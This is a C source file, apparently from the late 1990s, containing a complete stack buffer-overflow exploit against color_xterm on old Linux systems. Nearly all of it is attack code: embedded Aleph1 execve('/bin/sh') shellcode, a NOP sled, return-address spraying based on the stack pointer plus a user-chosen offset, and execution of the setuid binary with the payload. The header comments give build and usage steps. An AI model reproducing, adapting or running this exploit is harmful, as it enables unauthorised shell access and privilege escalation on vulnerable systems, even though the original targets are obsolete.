/* Larry W. Cashdollar color_xterm exploit for old linux boxen. 
  ~ 1996 - 1997  lwc@vapid.dhs.org 
   $ gcc exp-col.c -o exp-col 
   $ ./exp-col <offset>
 
   Try offsets from -1000 to 0
   Worked on:
   ? Linux 2.0.32 #9 Fri Dec 5 14:42:34 EST 1997 i686
   Slackware 3.0 Linux 1.2.13 #15 Sat Dec 4 19:01:23 EST 1999 i486
*/


#include <stdio.h>
#include <stdlib.h>


#define NOP 0x90
#define LEN 1048
/*#define RET 0xbffff5b4 slackware 3.2?*/

char shellcode[]= /*Aleph1's shell code. see phrack article*/
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";


unsigned long get_sp(void) {
	__asm__("movl %esp,%eax");
}


int main(int argc , char *argv[]) {
char buffer[LEN];
int i,offset;
unsigned long addr;

printf("Old Color_xterm exploit 1996-97 linux boxen \n");
printf("Larry W. Cashdollar  lwc@vapid.dhs.org      \n");

addr = get_sp();
offset = atoi(argv[1]);

/*Fill the entire buffer with the return address.*/
for (i=strlen(buffer);i<LEN;i+=4) *(long *)&buffer[i] = addr + offset;

/*Fill the first 250 bytes of buffer with NOPs*/
for (i=0;i<250;i++) *(buffer+i) = NOP;

/*Tack the shellcode on the end of the NOP string.*/
memcpy(buffer+i,shellcode,strlen(shellcode));

printf("Offset -> %d\n",offset); 
printf("Using Address 0x%x\n",offset+addr);

/*Exec the command with our payload.*/
execl("/usr/X11/bin/color_xterm","color_xterm","-xrm",buffer,0);

}

/*N = NOP S = Shell code R = Return address. */
/*[NNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR]*/
/*                    ^---buffer+i   ^---buffer+i+strlen(shellcode)*/